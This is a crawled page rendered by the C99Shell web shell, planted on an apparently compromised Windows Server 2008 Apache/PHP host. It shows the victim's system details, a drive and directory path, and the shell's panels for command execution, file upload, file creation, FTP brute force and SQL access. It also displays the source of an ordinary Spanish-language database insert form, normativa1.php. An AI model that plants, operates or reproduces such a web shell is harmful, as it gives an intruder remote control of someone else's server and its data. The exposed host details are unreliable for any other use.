!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA2\boletinlegal\admin\seguridad\   drwxrwxrwx
Free 7.32 GB of 239.26 GB (3.06%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     normativa1.php (6.73 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es" dir="ltr">
<link rel="StyleSheet" href="../tabla_files/orangebrownie.css" type="text/css">
<style type="text/css">
<!--
.Estilo2 {font-family: Georgia, "Times New Roman", Times, serif}
-->
</style>
<head>
    <link rel="icon" href="./favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="./favicon.ico" type="image/x-icon" />
<title>phpMyAdmin</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="stylesheet" type="text/css" href="phpmyadmin.css.php" />
    <link rel="stylesheet" type="text/css" href="print.css" media="print" />
    <script type="text/javascript">
    // <![CDATA[
    // Updates the title of the frameset if possible (ns4 does not allow this)
    if (typeof(parent.document) != 'undefined' && typeof(parent.document) != 'unknown'
        && typeof(parent.document.title) == 'string') {
        parent.document.title = 'localhost / localhost / bla / normatividad | phpMyAdmin 2.11.0';
    }
    
    // ]]>
    </script>
    <script src="./js/tbl_change.js" type="text/javascript"></script>
        
    <script src="./js/tooltip.js" type="text/javascript"></script>
    <meta name="OBGZip" content="true" />
        <!--[if IE 6]>
    <style type="text/css">
    /* <![CDATA[ */
    html {
        overflow-y: scroll;
    }
    /* ]]> */
    </style>
    <![endif]-->
</head>
 
<body>
<!-- Set on key handler for moving using by Ctrl+arrows -->
<script src="./js/keyhandler.js" type="text/javascript"></script>
<script type="text/javascript"> 
//<![CDATA[
var switch_movement = 0;
document.onkeydown = onKeyDownArrowsHandler;
//]]>
</script>
 
<!-- Insert/Edit form -->

<div id="boundary">
  
    <div id="content">
      <div id="itsthetable">
<form method="post" action="tbl_replace.php" name="insertForm"  enctype="multipart/form-data">
  <table border="1">
        <tr>
            <th><span class="Estilo2">Campo</span></th>
            <th><span class="Estilo2">Caracteres</span></th>
          <th colspan="2"><span class="Estilo2">Valor</span></th>
          </tr>
                <tr class="even">
            <td  align="center"><span class="Estilo2">norma</span></td>
 
                    <td align="center" nowrap="nowrap"><span class="Estilo2">
                50            </span></td>
 
                  <td colspan="2">
            
                    <input name="fields[multi_edit][0][norma]" type="text"
                    class="textfield "
                    id="field_2_3"                    tabindex="4"
                    value="" size="40" maxlength="50" onpropertychange="return unNullify('norma', '0')" />                  </td>
          </tr>
                <tr class="odd">
            <td  align="center"><span class="Estilo2">año</span></td>
 
                    <td align="center" nowrap="nowrap"><span class="Estilo2">
                4            </span></td>
 
                  <td colspan="2">
            
                    <input name="año" type="text"
                    class="textfield "
                    id="field_3_3"                    tabindex="7"
                    value="" size="12" maxlength="4" onpropertychange="return unNullify('año', '0')" />                  </td>
          </tr>
                <tr class="even">
            <td rowspan="2" align="center"><span class="Estilo2">resuelve</span></td>
 
                    <td align="center" nowrap="nowrap"><span class="Estilo2">1000</span></td>
 
                  <td><span class="Estilo2"></span></td>
                  <td><span class="Estilo2"></span></td>
        </tr>
        <tr class="even">
            <td colspan="4" align="right">
                
                <span class="Estilo2">
                <textarea name="resuelve"
                    rows="14"
                    cols="80"
                    dir="ltr"
                    id="field_4_3"
                    onpropertychange="return unNullify('resuelve', '0')"                    tabindex="10"
                    ></textarea>
                </span> </td>
      </tr>
                <tr class="odd">
            <td  align="center"><span class="Estilo2">sector</span></td>
 
                    <td align="center" nowrap="nowrap"><span class="Estilo2">
                15            </span></td>
 
                  <td colspan="2">
            
                    <input name="sector" type="text" class="textfield " id="field_5_3" tabindex="13" value="" size="40" onpropertychange="return unNullify('sector', '0')" />                  </td>
          </tr>
                <tr class="even">
            <td  align="center"><span class="Estilo2">vinculo</span></td>
 
                    <td align="center" nowrap="nowrap"><span class="Estilo2">
                200            </span></td>
 
                  <td colspan="2">
            
                    <input name="vinculo" type="text"
                    class="textfield "
                    id="field_6_3"                    tabindex="16"
                    value="" size="40" maxlength="200" onpropertychange="return unNullify('vinculo', '0')" />                  </td>
          </tr>
                <tr>
            <th colspan="4" align="right" class="tblFooters">
                <input type="submit" value="Guardar" />&nbsp;            </th>
        </tr>
  </table>
</form>
</div>
</div>
</div>

<!-- Restart insertion form -->
<script type="text/javascript"> 
//<![CDATA[
// updates current settings
if (window.parent.setAll) {
    window.parent.setAll('es-utf-8', 'utf8_unicode_ci', '1', 'bla', 'normatividad');
}
    // set current db, table and sql query in the querywindow
if (window.parent.reload_querywindow) {
    window.parent.reload_querywindow(
        'bla',
        'normatividad',
        '');
}
    
if (window.parent.frame_content) {
    // reset content frame name, as querywindow needs to set a unique name
    // before submitting form data, and navigation frame needs the original name
    if (typeof(window.parent.frame_content.name) != 'undefined'
     && window.parent.frame_content.name != 'frame_content') {
        window.parent.frame_content.name = 'frame_content';
    }
    if (typeof(window.parent.frame_content.id) != 'undefined'
     && window.parent.frame_content.id != 'frame_content') {
        window.parent.frame_content.id = 'frame_content';
    }
    //window.parent.frame_content.setAttribute('name', 'frame_content');
    //window.parent.frame_content.setAttribute('id', 'frame_content');
}
//]]>
</script>
</body>
</html>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--